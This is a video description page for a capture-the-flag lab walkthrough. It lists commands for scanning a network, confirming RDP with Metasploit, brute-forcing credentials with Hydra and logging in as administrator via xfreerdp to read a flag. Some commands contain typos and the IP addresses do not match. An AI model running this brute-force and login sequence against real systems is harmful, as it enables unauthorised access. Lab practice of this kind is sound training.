Project 81 - Using Brute Forced Credentials To Log Into A Remote Server Using FreeRDP (CFT!) 🏴 ☠️
Автор: Daryl Shows His Work
Загружено: 2025-11-21
Просмотров: 20
Commands Used:
1. ifconfig
2. fping -a -g 10.10.42.0/24
3. nmap sV -p -O 10.10.24.1
4. Open another terminal: service postgresql start && msfconsole Checking if port 3333 is running RDP
5. workspace -a RDP
6. workspace
7. db_status
8. setg RHOSTS 10.10.24.1
9. search rdp_scanner
10. use auxiliary/scanner/rdp/rdp_scanner
11. show options
12. set RPORT 3333
13. run
Running Hydra to brute force RDP
14. Open another terminal: hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://10.10.24.1 -s 3333
To Login using found credentials with FreeRDP
15. xfreerdp /u:administrator /p:qwertyuiop /v:10.10.24.1:3333 (FreeRDP is a free open-source implementation of the Remote Desktop Protocol and offers client/server solutions for remote Windows desktop access).
16. Type Y
17. Click Windows symbol in lower left-hand corner to show we are logged in as administrator
18. Click Computer
19. Go to C Drive
20. Click on flag.txt to view flag code
Доступные форматы для скачивания:
Скачать видео mp4
-
Информация по загрузке: